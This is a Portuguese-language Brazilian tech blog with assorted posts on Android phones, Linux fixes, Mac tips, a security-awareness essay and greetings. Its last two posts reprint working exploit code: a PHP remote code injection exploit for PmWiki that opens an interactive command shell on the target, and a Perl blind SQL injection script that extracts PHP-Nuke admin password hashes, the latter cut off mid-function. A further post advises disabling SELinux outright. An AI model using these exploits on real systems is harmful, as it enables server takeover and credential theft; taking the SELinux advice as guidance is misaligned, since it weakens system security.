HTC deixa o Brasil, agora temos menos opções de SmartPhones com specs requintadas!

Standard

Segundo o site da Ajuda Android, a HTC está fechando as portas no Brasil. (vide link: http://www.ajudandroid.com.br/2012/06/htc-fechou-as-portas-no-brasil-e-nao.html)

O que torna desleal a concorrência de aparelhos smartphone no Brasil, tendo como ponte de partida para especificações de alto nível somente aparelhos Samsung (estamos citando aparelhos com android).

Lamentavelmente a HTC nunca conseguiu trazer seus aparelhos de alto nível de specs, como o Edge ou Ruby, que em tempos de anúncios dual core da Samsung já traziam consigo Smartphones munidos de cpus QuadCore.

Motorola é muito boa, mas jamais será um concorrente páreo para Samsung, principalmente no que tange a Software.

Esperamos que os frutos da investida Google -> Motorola possam tornar-se notórios a todos os olhos e que possamos ter tamanho comprometimento/respeito pelo consumidor final como a Samsung apresenta.

Desejamos longa vida aos poderosos HTC.

Red Hat, Centos, Fedora e Rhel Based com intel E1000 (e1000e) apresentando queda de rede

Standard

Uma coisa interessante, na verdade um bug no módulo de rede E1000 (Intel GB) está ocorrendo em plataformas Rhel Based (Red Hat 5.x e 6.x e Fedora 16) onde o sistema operacional simplesmente deixa a interface de rede trabalhando, do nada a mesma apresenta congelamento (isto mesmo, o sistema continua on, mas a interface de rede OFF). Não adiantará muito atualizar o Kernel, pois ele não trará a solução. Abaixo irei dar dicas de como resolver, no meu caso fui vitimado sob Centos 6.2:

Como root execute:

lsmod | grep e1000

Se a resposta for:

e1000e

Execute o comando como root:

modinfo e1000e

Na saída, logo no começo, veja se a informação do módulo é esta:

version: 1.4.4-k

Caso seja é JUSTAMENTE a cabrita bugada, para sanar vamos ativar um repositório com rpms fresquinhos:

CentOS 6.x -> rode como root:

rpm -Uvh http://elrepo.org/elrepo-release-6-4.el6.elrepo.noarch.rpm

CentOS 5.x -> rode como root:

rpm -Uvh http://elrepo.org/elrepo-release-5-3.el5.elrepo.noarch.rpm

Depois, como root rode:

yum install kmod-e1000e.x86_64 -y

Depois será necessário um reboot no servidor.
Assim que o servidor levantar rode:

modinfo e1000e

Veja se está como abaixo:

[root@appunixlabs ~]# modinfo e1000e
filename: /lib/modules/2.6.32-220.17.1.el6.x86_64/weak-updates/e1000e/e1000e.ko
version: 1.11.3-NAPI

 

Devemos forçar o kernel a utilizar alguns recursos a menos para que possamos contornar o bug, vamos forçar o consumo de energia ao invés de poupar (infelizmente TI verde não é com essa NIC -> Active-State Power Management tem de estar OFF), entre no grub.conf e informa a linha abaixo no final da instrução de boot do kernel utilizado por seu sistema:

pcie_aspm=off e1000e.IntMode=1,1 e1000e.InterruptThrottleRate=10000,10000 acpi=off

 

Se você receber Kernel Panic por causa das flags acima, entre novamente no servidor com qualquer outra imagem de kernel e informe no final da primeira instrução de kernel que apresentava Kernel Panic:

pcie_aspm=off

Somente a flag acima e deixa o pau quebrar.

 

Bug informado em:

https://bugzilla.redhat.com/show_bug.cgi?id=632650

https://bugzilla.redhat.com/show_bug.cgi?id=808638

https://bugzilla.redhat.com/show_bug.cgi?id=625776

http://bugs.centos.org/view.php?id=5614

 

Como adicionar uma flag no grub sem problemas no CentOS, Fedora ou RedHat?

Standard
grubby --grub --args="pcie_aspm=off" --update-kernel=ALL
Use o comando acima para adicionar a flag pcie_aspm=off como instrução no Boot do seu Linux.
Depois de adicionar será necessário reiniciar o sistema.
Perceba que o ajuste também poderia ter sido feito manualmente, bastando apenas acrescentar
pcie_aspm=off no final da instrução de boot da imagem do kernel.

Abraços galera.

			

Demoramos, mas voltamos com novidades bacanas -> Ice Cream Sandwich bem pertinho de sair do forno para MILESTONE 2

Standard

Gente, aos que estão com ansiedade em relação ao ICS no Milestone 2, informamos por meio deste que a turma do XDA está a mil por hora nessa rom, muitos bugs já foram corrigidos, mas ainda há muito trabalho a ser realizado. Para que você possa acompanhar o trabalho basta acessar o link abaixo:

http://forum.xda-developers.com/showthread.php?t=1623385

Percebe-se que os esforços já trazem alguns frutos marcantes para usabilidade, veja um pequeno changelog do que roda tranquilo:

Working:
– Features from tezet rom.
– Recording (works, but unstable)
– Panorama (built-in camera app)
– Barcode scanner
– VPN(PPTP MPPE)
– 1% Battery

Not working:
– HWA (include Flash, Chrome)
– Crystal Talk
– H264 high profile decoding

Known Bugs:
– 3G Roaming
– Unknown number when dial out

Changelog:
* 2012/6/2:
– barcode scanner works
– built-in VPN with mpppe works (I only test this kind)
– add 1% battery
– fix AZERTY keyboard (thx boorce.com)
– sync repo 06/02

* 2012/5/27:
– fix crash problem when take picture

* 2012/5/26:
– sync cm9 repo
– add panorama support
– add Apollo(music app)
– add CMWallpaper
Bugfix:
– settings->themes will not crash

* 2012/5/11: sync 0511 repo

ADB debugging shouldn’t be disabled, full wipe is recommended.

 

Basta acompanhar essa thread e verá, logo no começo que os changelogs mostram coisas novinhas novinhas.
Apesar de instável já possui usuários, mas só iremos fazer um how to assim que a rom estiver mais estável para que você não tenha travamentos, reboots e outras coisas indesejáveis.
Abraços pessoALL!

'xterm-256color': unknown terminal type no mac os x Lion, Mac os x mountain ou mac os x snow leopard

Standard

Se este erro ocorre com você na tentativa de acesso ao terminal de um servidor Ubuntu, Debian, Mint ou qualquer outro Debian Based usando Mac os X e recebe o erro ‘xterm-256color’: unknown terminal type, entre no servidor de destino aonde o terminal conecta e use o seguinte comando:

apt-get install ncurses-term -y

Isso vai instalar o pacote que faltava.

Interessante que se o erro não for corrigido, por exemplo, um comando inportante como top ou screen não funcionam :(.

Em plataformas Red Hat não rola isto.

Parabéns Tio Rui!!!!!!

Standard

Fala galera tudo tranquilo?

Hoje vou fazer algo meio inusitado e vou roubar um pedacinho do lugar onde tento ajudar vocês leitores com os artigos que faço para homenagear e dar os mais sinceros votos de saúde, paz e muita properidade a um GRANDE amigo, parceiro de “horas extras” e principalmente um PAI disfarçado de ITO que tenho aqui na capital.

É um cara ainda mais mal humorado que eu, ainda mais chato que eu, mas igualmente a mim, trata GENTE como GENTE, esse cara é mais conhecido na redondeza como Tio Rui. Ele não é Tio de ninguém, mas é tratado como tal por todos….. Não é por ser mais velho (até  pessoas de quase mesma idade que ele o chamam de Tio Rui), mas acredito sinceramente que seja pelo tamanho do seu coração e pela forma que valoriza as pessoas.

Fazem quase exatos 3 anos que cai literalmente de pára-quedas aqui na empresa… Onde no mundo um empreendedor iria dar uma oportunidade a um cara vindo do interior, com cara de nerd e que nem ao menos conhecia uma linha do meu passado?

Tio Rui é  o nome do doido, esse louco me deixou no primeiro dia que bati aqui procurando oportunidade (intermediado por um cara que nem sabia direito quem era) já começar a trabalhar na empresa dele…. Esse cara me ofereceu o braço quando eu mais precisei, como não ser grato esse tipo de gente….

De tanto xingo que já levei desse cara, que já até estou acostumado…. Sem demagogia, os últimos 3 anos trabalhando na equipe desse cara , foram além de um grande aprendizado, uma grande experiência no que tange a convivência humana… Não consigo entender como uma só cara consegui ter um coração tão grande….

Tio Rui é o típico Pai (pelo menos parecido com o meu), ele não dá os peixes prontos, temperados e fritos… Mas a rede ele coloca na sua mão e te manda pro mar pra conseguir seu próprio peixe….  Aprendo a cada minuto com a nobreza desse grande amigo….

Tio Rui esse texto é apenas um singela homenagem que faço pra você, pra lhe desejar um Feliz aniversário  e tudo de melhor que DEUS e a vida possam lhe oferecer…. Que essa parceria perdure por muitos e muitos anos e que consigamos alcançar o mais rápido possível  todos os nossos  objetivos de vida e que essa amizade dure pra sempre. Obrigado por tudo Tio Rui, sou e serei grato por tudo que fez e que faz por mim…. Conte comigo sempre que precisar!!!

Douglas Moura

Failed loading /usr/lib/php/modules/php_ioncube_loader_lin_5.1.so: /usr/lib/php/modules/php_ioncube_loader_lin_5.1.so: cannot restore segment prot after reloc: Permission denied

Standard

Depois de instalar tudo em seu servidor Centos (falo de ambiente lamp2 no centos), ao instalar o ioncube você percebe a mensagem de erro:

Failed loading /usr/lib/php/modules/php_ioncube_loader_lin_5.1.so:  /usr/lib/php/modules/php_ioncube_loader_lin_5.1.so: cannot restore segment prot after reloc: Permission denied

Calma, nem você é do mal e nem seu servidor, isso ocorre por que o SELinux está monitorando as coisas, permissões e etc, teremos de desativar o danado :(,

Para desativarmos o SELINUX devemos seguir os passos abaixo:

vim

/etc/sysconfig/selinux
Dentro deste arquivos devemos mudar a linha
SELINUX=permissive (ou enforcing) para:
SELINUX=disabled

Após, basta dar um reboot do dragão e ver que o problema foi sanado :D.

Como abrir abas com o Botão Central(Scroll) do mouse No Mac OS X

Standard

Olá galera tudo na paz?

Acharam que o Doooguinha tinha morrido né…. Graças a DEUS meu sumiço aqui na guia artigos é somente pela imensidade de trabalho e todo o tempo dedicado à faculdade, tenho trabalhado/estudado muito galera (principalmente pra trazer conteudo de qualidade aqui pra vocês)…. Sem muito tempo pra nada, aliás, só tenho tido tempo pra Faculdade/Esposa/Trabalho… Mas hoje no meu dia de folga (folga mesmo) vim aqui pra dar um dica simples e que descobri por acaso ontem…. Apesar de usar Mac OS a bastante tempo e desde versões remotas do sistema, nunca havia conseguido solucionar esse “problema”… Por Padrão, pelo menos nos MacBooks, o botão Scroll do mouse faz vir à tona nosso Drash Board…. Digo no MacBook, pois nos hackintosh o botão Scroll vem com a função que vou mostrar nesse artigo, que é a de abrir nova aba em seus navegadores….

Uma das funções que o usuário Windows e Linux tendem a querer trazer ao mundo mac é o fato de poder abrir novas abas em seus navegadores prediletos apenas clicando com o botão do scroll… como disse no MacBook essa função por padrão vem “Desativada”… vamos lá, vamos ativá-la….

Vale lembrar também que essa dica é pra quem utiliza-se de Mouse no uso do seu Mac, quem utiiza o Trackpad por exemplo essa dica não faz sentido algum….

Primeiramente você precisa ir até as Preferências do Sistema

Preferências do Sistema

 

Chegará aqui (estou utilizando como referência o Mac OS X Lion do meu MacBook)

Imagem_01

 

Vá em Miss Control que está localizado na parte superior da janela

Imagem_02

 

Ao acessar o Miss Control Chegará a tela principal de configuração do mesmo

Imagem_03

 

Esse tela mostrada aqui é o Padrão vindo no MacBook… vale lembrar que por não terem Trackpad com os MacBooks (White/Pro/Air) os IMacs e Macs Pro possivelmente já devem vir com a opção que vou mostrar no artigo ativadas ou desativadas (como preferir)….

 

para que seu botão Scroll ao invés de chamar o Drash Board, abra links em novas abas de seus navegadores, basta apenas aterar a opção de

Imagem_03

 

para

 

Imagem_04

Podem ver que eu apenas tirei o segundo atalho para o Drash Board que era o Botão Central (aqui estou chamando de Scroll) e deixei em Branco (-)…. Aproveitando a deixa do artigo, se você acha chato ou ineficiente os atalho do Miss Control que vem por padrão no Mac OS, você pode mudar da forma que achar melhor….

Foi essa a dica de hoje galera, caso tenham dúvida ou seu Mac OS nào seja o Lion e você não se sinta a vontade para fazer o procedimento, peça ajuda que terei o maior prazer em lhe ajudar….

Em respeito a vocês, peço descupas pela falta de artigos aqui, Mas no que precisarem, podem perguntar… ao menos as perguntas dos leitores eu respondo….

Forte abraço e fiquem com DEUS……

Gostou? Comente, complemente e espalhe!

 

Segurança da Informação

Standard

Segurança da Informação (parte 1) – Conceitos Mod NUB 1

 

Intitulo “mod nub 1” a este artigo pois o considero extremamente básico para quem está querendo se aprofundar em um assunto, que na verdade é um mundo (e olhe que não é novo) vasto, não completamente desvendado e ainda um ramo cujo grau de conhecimento é levado ao extremo e requer superação mais que diária. (complicado de entender, não?… NÃO!)

Novamente não justifico o termo nub 1 para pessoas que não sabem de nada, na verdade destina-se a uma afirmação -> Vamos falar com simplicidade sobre o que é segurança.

Mais em breve faremos um artigo com mais ênfase em espionagem industrial.
Esse artigo na verdade encaixa-se muito bem às pessoas que adoram pirataria, ou “gestores de ti” que costumam “amarrar investimentos” (sim… sabe aqueles IMACS que sua empresa não compra alegando que é um investimento MUITO, MUITO, MUITO alto? Talvez aquilo não tenha tanta possibilidade de cair na malha fina dos [firmwares] de Motherboards, o que nada mais nada menos seria que um trojan (falo de backdoor) auto instalado/inicializado sempre que teu sistema for formatado/reiniciado/inicializado. OU talvez, quem sabe, a falta de conhecimento em ambientes Linux ou mesmo SOLUÇÕES para segurança proativa dos pcs é tratada como uma cereja do bolo [quando na verdade equivale-se à água que bebemos]).

 

Dividiremos este nub article em 2 pontos de vista:

 

– O carinha que chega em casa, fica de cueca em frente o seu laptop, com um umidificador de ar por perto de aparelhos eletrônicos (nub NE?).

– A instituição que possui um baú de ouro (é camarada, aquele DB, Aquele source que vocês desenvolvem, aquele aplicativo que parece uma arma nuclear, que vale muito e lhe custa muito, ou mais especificamente, aquela instituição que tem algo aonde vale a pena por em risco sua liberdade [sim, se for pego é xadrez!]).

 

Ao ponto 1, usuários domésticos

Como é gostosa a tentação de baixar um filme gravado através de um botão de camisa de um internauta que foi ao cinema, não? (sim, existem camcorders do tamanho de um botão de camisa, e não são caros)

Ou aquele aplicativo que custar-lhe-ia R$ 2.500,00, ou ainda melhor, “vamos testar esse Windows novo que saiu, achei aqui, olha, um torrent no the pirate bay… baixa aí, não, deixa que baixo na empresa, o link lá é bom…”, preciso comentar que isto é realidade absoluta? E os mp3s? Vamos baixar CDs?

Tenho fatos técnicos que vão fazer você mudar essa mentalidade.

Vamos ao ponto máximo da charada:

EU SERIA UM IMBECIL de simplesmente gravar com camcoder um filme inteiro (digamos, velozes e furiosos 5, ou mesmo Missão Impossível 4 [assistir amanhã]) com a vulnerabilidade de ser pego pela polícia, perder mulher, filho, cachorra e PC? Ou disponibilizar o último DVD do artista nacional/internacional mais caro e mais cobiçado da atualidade de graça?

Sim, isso deixa alguém por anos atrás de um paredão de concreto e aço.

TUDO, TUDO mesmo tem um preço, correr um risco tão absurdo de sofrer punições com leis nacionais (e até internacionais) não poderá lhe custar tão barato assim (falo como “downloader”), se você vive de baixar algo “arrumo free na web”, prepare os lombos pois vou agredir-lhe!

Existem técnicas (veja-as: http://pt.wikipedia.org/wiki/Esteganografia) que servem justamente para acabar com sua alegria. Esteganografia é o fato técnico para toda criminalidade baseada em “sharing”.
Esta questão de invisibilidade é tão séria que Charles Chaplin participou de um concurso de sósias DELE MESMO e tirou em terceiro lugar! Sim, nem ele parecia com ele mesmo… rsrsrs…

Deixe-me clarear sua mente. Se eu chegar em sua casa de terno e gravata eu sou o little_oak de terno e gravata, correto? ERRADO! Debaixo do meu terno posso estar carregando uma pistola, granada ou até mesmo um iphone 4 s ou um milestone 2 ;D.

Mas espere… você só sabia que eu tinha terno e gravata, não?

É aí que  a casa cai para você!

Em um filme/arquivo pdf/aplicativo pirata (ou Não pirata, mas a margem sob piratas é de pelo menos 90%) você estará carregando uma bomba oculta, isto graças aos joinners, sim, aplicativos que colocam UM ARQUIVO DENTRO DE OUTRO.

E você aí, se chegou até aqui deve estar dizendo: E EU COM ISSO?

“Lá xibatada”:
Quando eu executo um arquivo/programa/música em meu PC, baixados ou não da internet, a permissão que eu tenho como usuário será atribuída ao arquivo (sim, sim, não adianta falar de botão direito e executar com X nível de permissão que isso é passado/besteira quando falamos de buffer overflow/scalation) no momento da execução. AINDA QUE VOCÊ POSSUA UM ANTIVÍRUS PAGO, se você autoriza um arquivo a executar em seu S.O., o grau de detecção passa a ser mínimo (falo da defesa proativa do seu antivírus), logo você torna-se vulnerável!

Antivírus trabalham monitorando eventos/sockets/serviços do seu sistema, qualquer anomalia de comportamento em um dos 3 fatos desencadeia na execução de processos da defesa proativa do seu antivírus.

Até aí você sente-se blindado, está tudo atualizado mesmo… Enganou-se novamente!

Se você autorizou um aplicativo/filme/mp3 a rodar no seu S.O. há uma imensa chance de seu antivírus passar a confiar no comportamento (trust list), em outras palavras, FERROU-SE AMIGO!

Sabe aquele texto bacana que você escreveu para um artigo, ou para dar em cima da sua mulher / paquera / namorada / ficante… etc… etc…? Alguém já o leu devido sistemas de keyloggers automatizados! Rsrsrsrs…

Sabe aqueles dados do banco… Já se foram também… (isso vira inferno até na vida de terceiros… rsrsrsrs, depois detalho mais). Talvez você diga:

SAI DAÍ, BESTÃO, existe teclado virtual e senha que nem digito… hihiihi, bestão…

E EU LHE RESPONDO -> EXISTEM SCREENLOGGERS QUE PRINTAM CADA TELA TUA E ENVIAM DE FORMA ANÔNIMA E AUTORIZADA PELO TEU ANTIVÍRUS GRAÇAS A SUA NEGLIGÊNCIA DE BAIXAR TUDO E EXECUTAR TUDO QUE ENCONTRA NA WEB!

E se houverem dados de um processo contra alguém, uma informação sigilosa, um dado muito importante da minha família, amigos e etc? Isso foi junto?

CLARO QUE TUDO QUE CITEI trabalha em cima de probabilidades de sucesso MUITO ALTAS, e é provável que a resposta aqui seja SIM!

 

COMO RESOLVER ISSO?

1 – Formatar seu PC será quase nulo se estiver usando mídia pirata!

2 – Sim, aqueles “processos SEXY” com nome adob.exe, msnmsgss.exe, ou mesmo o svchost “aparentando santidade” não te garantem dias felizes, seu antivírus, mesmo sendo pago deverá ser substituído por outro que NÃO TEM UMA TRUST LIST (isso é SOMENTE para higienização, refiro-me a trustlist “virgem”).

3 – Evite baixar “QUALQUER COISA” NO SEU PC!

4 – SIM, aqueles emails que vêm de pessoas conhecidas suas SÃO PRIORIDADE para scan, principalmente os que possuem títulos como: “PEGUEI AS FOTOS DA TRAIÇÃO”, “EU LHE FALEI…”, “SEU NOME ESTÁ NO SPC”… etc.  (provavelmente o PC desta pessoa já se foi junto com tantos trojans, aquilo lá, na verdade é um estábulo de tanto cavalo de Tróia).

Antes que você ache que estou sendo muito metido, pense com carinho, pois da forma que citei ainda é possível usar seu PC como gateway para ataque a um banco, por exemplo, ou apenas como um PC zombie afim de estourar links de servidores, fazer spam e etc (SIM, ISTO TUDO SEM QUE VOCÊ POSSA VER, POIS SEU ANTIVÍRUS AUTORIZOU NAQUELA VEZ QUE INSTALOU PROGRAMA_YXZ NO SEU PC).

Vou citar algo melhor. Há poucos anos um avião comercial caiu em detrimento da falta de comunicação ocasionada entre base de controle -> aeronave. Isto ocorreu por causa de um worm que causou overload (super utilizou os recursos do sistema operacional da aeronave) e a aeronave não recebou as informações detalhadas sobre falhas que ocorriam no voo. O Final nós já sabemos… Lamentável (falo sem hipocrisia).

 

Não citei todos os casos graves e muitos detalhes técnicos pois, do contrário passaria dias.


Vamos falar de empresas agora!

Lamento pelo texto parecer grosseiro, mas errar de maneira equivocada afim de “alimentar” seu ego ou puramente por “economias de vinho tinto e peru” não são tolerados para crackers.

Você, gestor/admin de um setor de TI, sabia que pessoas morreram em 1989 (companhia chamada Partnair), em um voo comercial em detrimento de 3 parafusos falsos que seguravam a peça superior final do avião? (sim, o leme) OBS: Eram 4 parafusos, somente um era de fato AUTÊNTICO!

3 parafusos pirateados fizeram pessoas (pais de famílias, donos de empreendimentos que sustentavam famílias, não só isso, houve até um conflito diplomático na intenção de localizar erros militares para culpar forças militares por um erro de BURRECES ECONÔMICAS?) morrerem.

Aonde você se encaixa?

Cuidado pois sua rede pode não ter tanta segurança como aparenta ter (nem falo de smartphones ferrados, notebooks de funcionários ferrados e etc, falo de pirataria MESMO), e o pior, os dados da sua empresa podem estar nas mãos de outros… Isso sim é complicado…

Reflita como pessoa (sim, no ponto quando falo para home users) e veja se sua instituição merece o fim do voo comercial de 1989. Pense no que faz para evitar perder suas preciosas férias com higienizações de rede, reestruturação de segurança e até mesmo de um efetivo novo (perder aqueles caras que programam muito, que possuem um know how elevado, imagine esses caras indo embora por causa de reestruturações?).

 

Continua em breve… (falar mais de exploits, metodologias, erros comuns… etc… etc…)

Feliz 2012.

 

 

Feliz Natal e Excelente 2012 família AppUnix

Standard

E ai galera….. Tudo na Santa Paz de DEUS?

Final do ano chegando, presentes, família (visitá-los), namorada, reencontros….. isso é o final do ano pra mim….. Mas não poderia deixar passar em branco nosso primeiro natal juntos, queria agradecer imensamente a todos que visitaram nosso BLOG, que comentaram, que criticaram (esses pela sinceridade de falar nossos erros e corrigir para melhor atender nossos leitores), cada pessoa que visitou nosso BLOG nos fez ter energia para escrever um novo artigo e, principalmente manter nossa Luz  de levar informação de qualidade e de forma descompromissada a todos vocês….. Eu e Little_Oak começamos esse Blog como uma forma de documentar e de termos armazenado um pouco de nosso conhecimento para consultas futuras, seja no momento de uma prestação de serviços ou qualquer que outro motivo que seja…. É claro que não vamos ser hipócritas em dizer que não queríamos leitores e sucesso na WEB…. mas com certeza esse não é e nem era o foco principal do BLOG. Com o passar do tempo, começamos a dar mais atenção ao BLOG e, mesmo sem investimento em publicidade/propaganda, o BLOG vem nos surpreendendo com a quantidade de acesso, não escrevemos pensando no leitor X ou Y, o cara que tem LPI3 ou o cara que nunca usou terminal, escrevemos de uma forma que o cara que não sabe nada ou o cara que sabe tudo se sinta confortável e confiante em realizar os procedimentos sitados. Posso falar por mim, eu queria muito ter condições financeiras de me dedicar integralmente a esse BLOG, mas infelizmente não posso…..

Escrever aqui é algo que me deixa extremamente realizado, quando recebemos um elogio do tipo: “Salvou meu dia”  “Parabéns pela qualidade dos artigo”, issoagussa nosso EGO e a cada dia procuramos colocar conteúdo inédito aqui, não postamos sequer NENHUM artigo sem que sejam feitos muitos e muitos testes….

Sabemos que as vezes algumas de nossas tarefas cotidianas nos deixam sem tempo para dar a atenção devida aqui, queremos nos deculpar por isso…. Mas como disse acima, ainda não nos dedicamos integralmente ao BLOG por falta de $$$, o nosso sonho para 2012 é conseguir nos dedicar ao menos uma parte do dia somente a esse projeto, “seria interessante um patrocinador ou empresa que acredite em nosso projeto se manifestar para um patrocínio” (hauhauahuahuahuahauhauhauhaua), mesmo que pequeno…. Hoje pagamos para manter esse BLOG, infelizmente a publicidade que aqui colocamos não gera receita nem mesmo para mantê-lo, mas saibam que mesmo assim estamos muito felizes…..

Acabei esticando um pouco as coisas, mas o que quero mesmo dizer que Eu e Little_oak desejamos um Ótimo Natal a todos, que todos os sonhos e almejos sejam realizados, que Deus nos ilumine e nos dê sabedoria para tomar as melhores decisões e o principal, muita saúde e paz para todos nós…. Gostaria de mandar um adesivo ou um acaneca ou qualquer lembrancinha para cada um de nossos leitores, mas o $$$ ta curto…. mas se DEUS quiser em 2012 vamos fazer um lojinha virtual e conseguiremos sortear semanalmente brindes a vocês, nosso queridos leitores.

Reforçando, que 2012 seja infinitamente melhor que o ano que chega ao fim, que tanto no pessoal quando no profissional, Deus no dê sabedoria o bastante para tomar as melhores decisões e que nos dê força para procurar conhecimento a cada dia, pois uma das poucas coisas que o homem não pode nos tomar e o que sabemos…. Pra quem SABE o céu é o limite…..

Fiquem com DEUS e boas festas….

Confirmado Ice Cream Sandwich para Milestone 2 (Thanks Xda and Tzet ;) )

Standard

Ao que tudo indica o Tzet está matando a pau no Android 4.0.1 para o milestone 2.
Isto é muito bom pois em poucos dias teremos o S.O. disponível e bem estável.

Para conferir a nota completa acessem:

http://forum.xda-developers.com/showthread.php?t=1374497

 

Se observarem em outros lugares versão que no repositório deles não existe mais correria em cima da rom 2.3.7x, até por que o foco da própria google está quase que 100% destinado ao Ice Cream Sandwich.

Para ver a última rom do gingerbread lançada sobre Cyanogenmod acessem:

http://android.loicg.net/

Se o que você quer é instalar o gingerbread no milestone 2 clique aqui:

http://www.appunix.com.br/howto/linux/como-instalar-android-2-3-7-no-milestone-2-sem-perder-dados-e-de-forma-rapida/

 

 

 

 

 

 

 

 

 

 

Playing error : Sua instalação do GStreamer está com um plug-in faltando. at /usr/bin/../share/gmusicbrowser/gmusicbrowser_gstreamer-0.10.pm line 135.

Standard

Se essa é a mensagem de erro ao tentar tocar um arquivo MP3 junto ao seu Ubuntu/Xubuntu/Kubuntu, não chore e nem desanime, na verdade o que está rolando é a falta de plugins para stream de audio.
Para sanar isto basta abrir seu terminal e digitar:

sudo apt-get install ubuntu-restricted-extras -y

Serão baixados mais de 100mb de plugins, mas tudo bacana (mp3, flash, mp4, avi e etc…).

Depois disso é só alegria.

Abraços a todos ;P

PmWiki

Standard

<?php

/*
    -------------------------------------------------------------
    PmWiki <= 2.2.34 (pagelist) Remote PHP Code Injection Exploit
    -------------------------------------------------------------
    
    author...............: Egidio Romano aka EgiX
    mail.................: n0b0d13s[at]gmail[dot]com
    software link........: http://www.pmwiki.org/
    affected versions....: from 2.0.0 to 2.2.34
    
    +-------------------------------------------------------------------------+
    | This proof of concept code was written for educational purpose only.    |
    | Use it at your own risk. Author will be not responsible for any damage. |
    +-------------------------------------------------------------------------+
    
    [-] vulnerable code in PageListSort() function defined into /scripts/pagelist.php
    
    452.      $code = '';
    453.      foreach($opt['=order'] as $o => $r) {
    454.        if (@$PageListSortCmp[$o])
    455.          $code .= "$c = {$PageListSortCmp[$o]}; ";
    456.        else
    457.          $code .= "$c = @strcasecmp($PCache[$x]['$o'],$PCache[$y]['$o']); ";
    458.        $code .= "if ($c) return $r$c;n";
    459.      }
    460.      StopWatch('PageListSort sort');
    461.      if ($code)
    462.        uasort($list,
    463.               create_function('$x,$y', "global $PCache; $code return 0;"));
    464.      StopWatch('PageListSort end');
    
    Input passed through 'order' parameter of 'pagelist' directive isn't properly sanitized before being used
    in a call to create_function() at line 463. This can be exploited to inject and execute arbitrary PHP code.
    Successful exploitation of this vulnerability might require authentication if the wiki isn't public writable.
    
    [-] Disclosure timeline:
    
    [09/11/2011] - Vulnerability discovered
    [11/11/2011] - Issue reported to http://www.pmwiki.org/wiki/PITS/01271
    [11/11/2011] - Version 2.2.35 released: http://www.pmwiki.org/wiki/PmWiki/ChangeLog#v2235
    [12/11/2011] - CVE number requested
    [15/11/2011] - Assigned CVE-2011-4453
    [23/11/2011] - Public disclosure
*/
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);
function http_send($host, $packet)
{
    if (!($sock = fsockopen($host, 80)))
        die("n[-] No response from {$host}:80n");
 
    fputs($sock, $packet);
    return stream_get_contents($sock);
}
print "n+------------------------------------------------------------+";
print "n| PmWiki <= 2.2.34 Remote PHP Code Injection Exploit by EgiX |";
print "n+------------------------------------------------------------+n";
if ($argc < 3)
{
    print "nUsage......: php $argv[0] <host> <path>n";
    print "nExample....: php $argv[0] localhost /";
    print "nExample....: php $argv[0] localhost /pmwiki/n";
    die();
}
$host = $argv[1];
$path = $argv[2];
$phpcode = "']);error_reporting(0);passthru(base64_decode($_SERVER[HTTP_CMD]));print(___);die;#";
$payload = "action=edit&post=save&n=Cmd.Shell&text=(:pagelist order={$phpcode}:)";
$packet  = "POST {$path}pmwiki.php HTTP/1.0rn";
$packet .= "Host: {$host}rn";
$packet .= "Content-Length: ".strlen($payload)."rn";
$packet .= "Content-Type: application/x-www-form-urlencodedrn";
$packet .= "Connection: closernrn{$payload}";
if (!preg_match("/Location/", http_send($host, $packet))) die("n[-] Edit password required?!n");
$packet  = "POST {$path}pmwiki.php HTTP/1.0rn";
$packet .= "Host: {$host}rn";
$packet .= "Cmd: %srn";
$packet .= "Content-Length: 11rn";
$packet .= "Content-Type: application/x-www-form-urlencodedrn";
$packet .= "Connection: closernrnn=Cmd.Shell";
while(1)
{
    print "npmwiki-shell# ";
    if (($cmd = trim(fgets(STDIN))) == "exit") break;
    $response = http_send($host, sprintf($packet, base64_encode($cmd)));
    preg_match("/nrn(.*)___/s", $response, $m) ? print $m[1] : die("n[-] Exploit failed!n");
}

?>

 

Fonte: http://www.exploit-db.com/exploits/18149/

PHP-Nuke

Standard

#!/usr/bin/perl

# [0-Day] PHP-Nuke <= 8.1.0.3.5b (Downloads) Remote Blind SQL Injection
# Date: 2010.07.04 after 50 days the bug was discovered.
# Author/s: Dante90, WaRWolFz Crew
# Crew Members: 4lasthor, Andryxxx, Cod3, Gho5t, HeRtZ, N.o.3.X, RingZero, s3rg3770,
#               Shades Master, V1R5, yeat
# Special Greetings To: The:Paradox
# Greetings To: Shotokan-The Hacker, _mRkZ_, h473
# Web Site: www.warwolfz.org
# My Wagend (Dante90): dante90wwz.altervista.org
# ----
# Why have I decided to publish this?
# Because some nice guys (Dr.0rYX and Cr3w-DZ) have ripped and published
# my own exploit, with their names.
# FU**ING LAMERS / RIPPERS / SCRIPT KIDDIE
# ----
use strict;
use warnings;
use LWP::UserAgent;
use HTTP::Cookies;
use HTTP::Headers;
use Time::HiRes;
my $Victime  = shift or &usage;
my $Hash = "";
my ($Referer,$Time,$Response);
my ($Start,$End);
my @chars = (48,49,50,51,52,53,54,55,56,57,97,98,99,100,101,102);
my $HostName = "http://www.victime_site.org/path/"; #Insert Victime Web Site Link
my $Method = HTTP::Request->new(POST => $HostName.'modules.php?name=Downloads&d_op=Add');
my $Cookies = new HTTP::Cookies;
my $UserAgent = new LWP::UserAgent(
            agent => 'Mozilla/5.0',
            max_redirect => 0,
            cookie_jar => $Cookies,
            default_headers => HTTP::Headers->new,
        ) or die $!;
my $WaRWolFz = "http://www.warwolfz.org/";
my $DefaultTime = request($WaRWolFz);
my $Post;
sub Blind_SQL_Jnjection {
    my ($dec,$hex,$Victime) = @_;
    return "http://www.warwolfz.org/' UNION/**/SELECT IF(SUBSTRING(pwd,${dec},1)=CHAR(${hex}),benchmark(250000000,CHAR(0)),0) FROM nuke_authors WHERE aid='${Victime}";
}
for(my $I=1; $I<=32; $I++){ #N Hash characters
    for(my $J=0; $J<=15; $J++){ #0 -> F
        $Post = Blind_SQL_Jnjection($I,$chars[$J],$Victime);
        $Time = request($Post);
        sleep(3);
        refresh($HostName, $DefaultTime, $chars[$J], $Hash, $Time, $I);
        if ($Time > 4) {
            $Time = request($Post);
            refresh($HostName, $DefaultTime, $chars[$J], $Hash, $Time, $I);
            if ($Time > 4) {
                syswrite(STDOUT,chr($chars[$J]));
                $Hash .= chr($chars[$J]);
                $Time = request($Post);
                refresh($HostName, $DefaultTime, $chars[$J], $Hash, $Time, $I);
                last;
            }
        }
    }
    if($I == 1 && length $Hash < 1 && !$Hash){
        print " * Exploit Failed                                       *n";
        print " -------------------------------------------------------- n";
        exit;
    }
    if($I == 32){
        print " * Exploit Successfully Executed                        *n";
        print " -------------------------------------------------------- n";
        system("pause");
    }
}
sub request{
    $Post = $_[0];
